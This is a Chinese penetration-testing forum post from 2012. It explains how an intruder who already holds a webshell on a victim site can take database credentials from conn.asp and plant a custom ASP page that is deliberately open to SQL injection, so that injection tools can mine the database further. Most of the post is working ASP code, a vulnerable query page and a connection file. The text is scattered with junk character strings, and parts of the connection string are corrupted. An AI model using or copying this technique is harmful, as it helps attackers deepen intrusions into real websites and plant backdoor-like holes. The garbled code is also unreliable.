中国网络渗透测试联盟

标题: 自己构造注入点方便入侵 [打印本页]

作者: admin    时间: 2012-9-13 17:27
标题: 自己构造注入点方便入侵
自己构造注入点方便入侵9 u: Z3 ]* v4 w  h$ ]
0 \! V. K; e& n9 ^* u. h' q, g; A
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息3 p5 m7 h8 ?) L% q

5 P' n8 \$ e$ X% L1 I/ g这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
" C" S% h. D( u' i' U( W: C4 V8 h: j3 S. y
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和- E" s1 G5 Y: [) _
: k7 e* H) W& u; F6 Q# r$ C
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
5 z  s' }+ t2 ~6 G7 u( k4 n" q1 S. s. e* G, {3 A! |
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
; K" O- q4 J; m9 [5 Y2 [# B- q$ I) r% \) S( Z+ u  h7 Y  \
程序代码. A/ U* t7 s5 \' L
<!--#include file="xx.asp"-->
& {3 l7 ^) d7 f6 P<%
2 @% H$ d3 W9 C  n' Aset rs=server.createobject("ADODB.recordset")2 l  h/ k4 Q, p3 g+ D5 E
id = request("id")
+ E: m# r8 M6 X& x" jstrSQL = "select * from admin where id=" & id
5 n5 b  Z2 k) T) Srs.open strSQL,conn,1,3) x6 \( t  i# n! P' y
rs.close, `+ J8 y+ n4 Z, E' t. L0 a7 d% p. w
%>
4 [. M2 f5 f4 D2 B
9 e( B& y4 }7 S0 p2 m" J; T把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在3 t* X0 `  q9 `* K5 Y4 R$ o0 J) W8 ]
/ T) n( o' r5 H2 T
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!$ y$ k; v  \1 @/ V! O
& Y; R8 N* D2 \6 v2 \
然后就要构造一个连接数据库的文件了,代码如下:) N# q8 ?, b: l0 s3 K! S
程序代码& p( l* o3 B- K0 {& V
<%        
. [: K% s7 j) P3 cstrSQLServerName = "000.000.000.000"     '服务器名称或地址- i8 b! L; E% U- j0 C
strSQLDBUserName = "sqlname"         '数据库帐号9 i0 X5 s* W" y' e" E
strSQLDBPassword = "sqlpass"         '数据库密码( h1 m) Q8 ]2 ~" _. b# C- |+ ~9 T
strSQLDBName = "sqldataname"           '数据库名称  c9 d" c6 y' }, _& A% Z" b
Set conn = Server.CreateObject("ADODB.Connection")( ?& L9 V$ a; p
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
7 C+ h5 `* r: n( H" B" h+ b' S# ~conn.open strCon2 r3 S2 ^  _2 c  }
%>
" G5 \. }( a1 T, a( t' c! Y( J3 n6 u' a3 _, e/ Y* ^
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
5 J1 l9 x, G7 M  {/ X
/ u1 v5 L/ M+ v就这样,正常情况下,就OK了,伪造成功……( X5 s- `# v/ V

- A' b& Q6 Q+ j. x7 r           如果有什么问题可以提出来大家一起探讨解决。




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2